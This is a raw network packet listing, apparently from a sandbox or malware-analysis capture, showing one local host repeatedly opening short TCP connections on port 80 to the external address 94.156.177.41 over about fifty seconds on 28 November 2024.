Nov 28, 2024 09:15:11.605341911 CET	80	49844	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:11.605393887 CET	49844	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:11.605441093 CET	49844	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:11.725316048 CET	80	49844	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:11.744023085 CET	49849	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:11.863863945 CET	80	49849	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:11.864037037 CET	49849	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:11.866663933 CET	49849	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:11.986581087 CET	80	49849	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:11.986717939 CET	49849	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:12.106698990 CET	80	49849	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:13.478025913 CET	80	49849	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:13.478086948 CET	80	49849	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:13.478183031 CET	49849	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:13.478249073 CET	49849	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:13.598707914 CET	80	49849	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:13.627201080 CET	49854	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:13.747234106 CET	80	49854	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:13.747492075 CET	49854	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:13.749624014 CET	49854	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:13.869771957 CET	80	49854	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:13.869863987 CET	49854	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:13.989857912 CET	80	49854	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:15.453273058 CET	80	49854	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:15.453370094 CET	80	49854	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:15.453442097 CET	49854	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:15.453491926 CET	49854	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:15.573386908 CET	80	49854	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:15.600888968 CET	49859	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:15.720804930 CET	80	49859	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:15.720957994 CET	49859	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:15.723330975 CET	49859	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:15.843511105 CET	80	49859	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:15.847454071 CET	49859	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:15.967370033 CET	80	49859	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:17.303266048 CET	80	49859	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:17.303436041 CET	80	49859	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:17.303514957 CET	49859	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:17.307210922 CET	49859	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:17.427062035 CET	80	49859	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:17.529196024 CET	49864	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:17.649235010 CET	80	49864	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:17.649322033 CET	49864	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:17.651669025 CET	49864	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:17.771691084 CET	80	49864	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:17.771783113 CET	49864	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:17.891849995 CET	80	49864	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:19.281728029 CET	80	49864	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:19.281932116 CET	80	49864	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:19.281949997 CET	49864	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:19.282015085 CET	49864	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:19.401938915 CET	80	49864	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:19.429486990 CET	49869	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:19.549590111 CET	80	49869	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:19.549734116 CET	49869	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:19.551938057 CET	49869	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:19.671838999 CET	80	49869	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:19.671910048 CET	49869	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:19.791768074 CET	80	49869	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:21.096005917 CET	80	49869	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:21.096029043 CET	80	49869	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:21.096193075 CET	49869	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:21.096359015 CET	49869	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:21.216237068 CET	80	49869	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:21.247045994 CET	49874	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:21.367754936 CET	80	49874	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:21.367985964 CET	49874	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:21.370218039 CET	49874	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:21.490272045 CET	80	49874	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:21.490326881 CET	49874	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:21.610210896 CET	80	49874	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:22.994276047 CET	80	49874	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:22.994337082 CET	80	49874	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:22.994412899 CET	49874	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:22.994457006 CET	49874	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:23.114780903 CET	80	49874	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:23.136806011 CET	49880	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:23.256901979 CET	80	49880	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:23.257000923 CET	49880	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:23.259109974 CET	49880	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:23.379081964 CET	80	49880	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:23.380780935 CET	49880	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:23.500791073 CET	80	49880	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:24.698816061 CET	80	49880	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:24.698976040 CET	80	49880	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:24.699038982 CET	49880	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:24.699080944 CET	49880	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:24.819026947 CET	80	49880	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:24.835324049 CET	49885	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:24.955389023 CET	80	49885	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:24.955550909 CET	49885	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:24.957735062 CET	49885	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:25.077685118 CET	80	49885	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:25.077799082 CET	49885	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:25.197841883 CET	80	49885	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:26.498522043 CET	80	49885	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:26.498611927 CET	80	49885	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:26.498742104 CET	49885	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:26.498792887 CET	49885	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:26.618766069 CET	80	49885	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:26.657732964 CET	49889	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:26.777687073 CET	80	49889	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:26.777820110 CET	49889	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:26.779984951 CET	49889	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:26.899873972 CET	80	49889	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:26.899972916 CET	49889	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:27.019934893 CET	80	49889	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:28.370992899 CET	80	49889	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:28.371006966 CET	80	49889	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:28.371146917 CET	49889	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:28.371191025 CET	49889	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:28.491168022 CET	80	49889	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:28.505445957 CET	49893	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:28.625425100 CET	80	49893	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:28.625518084 CET	49893	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:28.627492905 CET	49893	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:28.747426033 CET	80	49893	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:28.747512102 CET	49893	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:28.867515087 CET	80	49893	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:30.274113894 CET	80	49893	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:30.274219990 CET	49893	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:30.274233103 CET	80	49893	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:30.274274111 CET	49893	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:30.394237041 CET	80	49893	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:30.413125038 CET	49898	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:30.533133030 CET	80	49898	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:30.533246040 CET	49898	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:30.535348892 CET	49898	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:30.655227900 CET	80	49898	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:30.655415058 CET	49898	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:30.775304079 CET	80	49898	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:32.167747974 CET	80	49898	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:32.167948961 CET	80	49898	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:32.168060064 CET	49898	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:32.168133020 CET	49898	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:32.287996054 CET	80	49898	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:32.310107946 CET	49903	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:32.430146933 CET	80	49903	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:32.432780027 CET	49903	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:32.434931993 CET	49903	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:32.554898024 CET	80	49903	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:32.556716919 CET	49903	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:32.676821947 CET	80	49903	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:34.019035101 CET	80	49903	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:34.019143105 CET	49903	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:34.019172907 CET	80	49903	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:34.019222975 CET	49903	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:34.139339924 CET	80	49903	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:34.165513992 CET	49909	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:34.285557985 CET	80	49909	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:34.285693884 CET	49909	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:34.287918091 CET	49909	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:34.407824039 CET	80	49909	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:34.408050060 CET	49909	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:34.528007030 CET	80	49909	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:35.875049114 CET	80	49909	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:35.875184059 CET	80	49909	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:35.875260115 CET	49909	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:35.875260115 CET	49909	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:35.995187044 CET	80	49909	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:36.025485992 CET	49914	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:36.145463943 CET	80	49914	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:36.145639896 CET	49914	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:36.147876024 CET	49914	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:36.267879009 CET	80	49914	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:36.267971039 CET	49914	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:36.387939930 CET	80	49914	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:37.777539968 CET	80	49914	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:37.777601004 CET	80	49914	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:37.777781963 CET	49914	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:37.777781963 CET	49914	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:37.897834063 CET	80	49914	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:37.913727999 CET	49918	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:38.033776999 CET	80	49918	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:38.033865929 CET	49918	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:38.036020994 CET	49918	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:38.156059027 CET	80	49918	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:38.156179905 CET	49918	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:38.276240110 CET	80	49918	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:39.432101011 CET	80	49918	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:39.432138920 CET	80	49918	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:39.432276964 CET	49918	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:39.432599068 CET	49918	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:39.552495003 CET	80	49918	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:39.574244022 CET	49922	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:39.694252968 CET	80	49922	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:39.694361925 CET	49922	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:39.696580887 CET	49922	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:39.816497087 CET	80	49922	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:39.816582918 CET	49922	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:39.936657906 CET	80	49922	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:41.183394909 CET	80	49922	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:41.183420897 CET	80	49922	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:41.183582067 CET	49922	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:41.209433079 CET	49922	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:41.329580069 CET	80	49922	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:41.351775885 CET	49928	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:41.471641064 CET	80	49928	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:41.471754074 CET	49928	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:41.477293968 CET	49928	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:41.597281933 CET	80	49928	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:41.597338915 CET	49928	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:41.719494104 CET	80	49928	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:42.916821957 CET	80	49928	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:42.916866064 CET	80	49928	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:42.916927099 CET	49928	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:42.917257071 CET	49928	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:43.036875963 CET	80	49928	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:43.052184105 CET	49930	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:43.172158957 CET	80	49930	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:43.172306061 CET	49930	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:43.174424887 CET	49930	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:43.294547081 CET	80	49930	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:43.294625998 CET	49930	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:43.414654970 CET	80	49930	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:44.758248091 CET	80	49930	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:44.758426905 CET	49930	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:44.758502960 CET	80	49930	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:44.758548975 CET	49930	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:44.878631115 CET	80	49930	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:44.898148060 CET	49935	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:45.018202066 CET	80	49935	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:45.018450975 CET	49935	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:45.020473957 CET	49935	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:45.140402079 CET	80	49935	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:45.140467882 CET	49935	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:45.261513948 CET	80	49935	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:46.605042934 CET	80	49935	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:46.605174065 CET	49935	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:46.605211973 CET	80	49935	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:46.605272055 CET	49935	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:46.725331068 CET	80	49935	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:46.745294094 CET	49938	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:46.865371943 CET	80	49938	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:46.865611076 CET	49938	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:46.867748022 CET	49938	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:46.988840103 CET	80	49938	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:46.988970041 CET	49938	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:47.108963966 CET	80	49938	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:48.264616966 CET	80	49938	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:48.264719009 CET	80	49938	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:48.264914036 CET	49938	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:48.264914989 CET	49938	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:48.384985924 CET	80	49938	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:48.421516895 CET	49943	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:48.541511059 CET	80	49943	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:48.541589022 CET	49943	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:48.543951988 CET	49943	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:48.663881063 CET	80	49943	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:48.663942099 CET	49943	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:48.783957005 CET	80	49943	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:50.179811001 CET	80	49943	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:50.179949999 CET	49943	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:50.180033922 CET	80	49943	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:50.180085897 CET	49943	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:50.300740004 CET	80	49943	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:50.319926023 CET	49948	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:50.439974070 CET	80	49948	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:50.440241098 CET	49948	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:50.502160072 CET	49948	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:50.622231960 CET	80	49948	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:50.622383118 CET	49948	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:50.742433071 CET	80	49948	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:51.927736044 CET	80	49948	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:51.927793980 CET	80	49948	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:51.927974939 CET	49948	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:51.927974939 CET	49948	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:52.047991037 CET	80	49948	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:52.084002018 CET	49952	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:52.204966068 CET	80	49952	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:52.206363916 CET	49952	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:52.208524942 CET	49952	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:52.328516006 CET	80	49952	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:52.328756094 CET	49952	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:52.448677063 CET	80	49952	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:53.836759090 CET	80	49952	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:53.836819887 CET	80	49952	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:53.838779926 CET	49952	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:53.838974953 CET	49952	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:53.958940983 CET	80	49952	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:53.975395918 CET	49958	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:54.095390081 CET	80	49958	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:54.095547915 CET	49958	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:54.097814083 CET	49958	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:54.217735052 CET	80	49958	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:54.218254089 CET	49958	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:54.338226080 CET	80	49958	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:55.577980042 CET	80	49958	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:55.578072071 CET	80	49958	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:55.578098059 CET	49958	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:55.578110933 CET	49958	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:55.697992086 CET	80	49958	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:55.742435932 CET	49962	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:55.862488985 CET	80	49962	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:55.862715006 CET	49962	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:55.864881039 CET	49962	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:55.984829903 CET	80	49962	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:55.988729954 CET	49962	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:56.108715057 CET	80	49962	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:57.305187941 CET	80	49962	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:57.305398941 CET	80	49962	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:57.305447102 CET	49962	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:57.308156013 CET	49962	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:57.425468922 CET	80	49962	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:57.444180965 CET	49966	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:57.564213991 CET	80	49966	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:57.564299107 CET	49966	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:57.566478014 CET	49966	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:57.686556101 CET	80	49966	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:57.686634064 CET	49966	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:57.808161974 CET	80	49966	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:59.101942062 CET	80	49966	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:59.101983070 CET	80	49966	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:59.102042913 CET	49966	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:59.102089882 CET	49966	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:59.222001076 CET	80	49966	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:59.244219065 CET	49971	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:59.364300013 CET	80	49971	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:59.364443064 CET	49971	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:59.366906881 CET	49971	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:59.487037897 CET	80	49971	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:59.487158060 CET	49971	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:59.607271910 CET	80	49971	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:00.808506012 CET	80	49971	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:00.808543921 CET	80	49971	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:00.808598042 CET	49971	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:00.808645964 CET	49971	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:00.928601980 CET	80	49971	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:00.946378946 CET	49976	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:01.066474915 CET	80	49976	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:01.066684008 CET	49976	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:01.069273949 CET	49976	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:01.189213037 CET	80	49976	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:01.189356089 CET	49976	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:01.309462070 CET	80	49976	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:02.507936954 CET	80	49976	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:02.507955074 CET	80	49976	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:02.508043051 CET	49976	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:02.508084059 CET	49976	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:02.628084898 CET	80	49976	94.156.177.41	192.168.2.7
